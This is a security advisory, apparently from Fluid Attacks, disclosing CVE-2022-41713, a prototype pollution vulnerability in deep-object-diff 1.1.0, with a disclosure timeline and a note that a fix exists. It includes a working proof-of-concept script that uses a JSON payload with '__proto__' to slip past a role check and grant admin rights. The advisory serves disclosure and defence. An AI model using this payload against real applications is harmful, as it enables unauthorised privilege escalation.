deep-object-diff 1.1.0 - Prototype Pollution

Summary

Namedeep-object-diff 1.1.0 - Prototype Pollution
Code nameHeldens
Productdeep-object-diff
Affected versionsVersion 1.1.0
StatePublic
Release date2022-11-15

Vulnerability

KindPrototype Pollution
Rule390. Prototype Pollution
RemoteYes
CVSSv3 VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CVSSv3 Base Score7.3
Exploit availableYes
CVE ID(s)CVE-2022-41713

Description

Version 1.1.0 of deep-object-diff allows an external attacker to edit or add new properties to an object. This is possible because the application does not properly validate incoming JSON keys, thus allowing the __proto__ property to be edited.

Vulnerability

Prototype pollution is a vulnerability that affects JS. It occurs when a third party manages to modify the __proto__ of an object. JavaScript first checks if such a method/attribute exists in the object. If so, then it calls it. If not, it looks in the object's prototype. If the method/attribute is also not in the object's prototype, then the property is said to be undefined.

Therefore, if an attacker succeeds in injecting the __proto__ property into an object, he will succeed in injecting or editing its properties.

Exploitation

exploit.js

import { diff, addedDiff, deletedDiff, updatedDiff, detailedDiff } from 'deep-object-diff';

let admin = {name: "admin", role:"admin"};
let user  = {role:"user"};

let normal_user_request    = JSON.parse('{"name":"user","role":"admin"}');
let malicious_user_request = JSON.parse('{"name":"user","__proto__":{"role":"admin"}}');

const create_user = (new_user) => {
    // A user cannot alter his role. This way we prevent privilege escalations.
    if(new_user?.role && new_user?.role.toLowerCase() === "admin") {
        throw "Unauthorized Action";
    }
    user = addedDiff(user, new_user);
    console.log(user?.role);
}

try {
    create_user(normal_user_request);
} catch (error) {
    console.log(error);
}
finally {
    create_user(malicious_user_request);
}

Evidence of exploitation

Prototype-Pollution

Our security policy

We have reserved the CVE-2022-41713 to refer to this issue from now on.

System Information

  • Version: deep-object-diff 1.1.0

  • Operating System: GNU/Linux

Mitigation

An updated version of deep-object-diff is available at the vendor page.

Credits

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

References

Vendor page https://github.com/mattphillips/deep-object-diff

Issue https://github.com/mattphillips/deep-object-diff/issues/85

Timeline

Time-lapse-logo

2022-10-05

Vulnerability discovered.

Time-lapse-logo

2022-10-05

Vendor contacted.

Time-lapse-logo

2022-10-05

Vendor replied acknowledging the report.

Time-lapse-logo

2022-10-05

Vendor Confirmed the vulnerability.

Time-lapse-logo

2022-11-12

Vulnerability patched.

Time-lapse-logo

2022-11-15

Public Disclosure.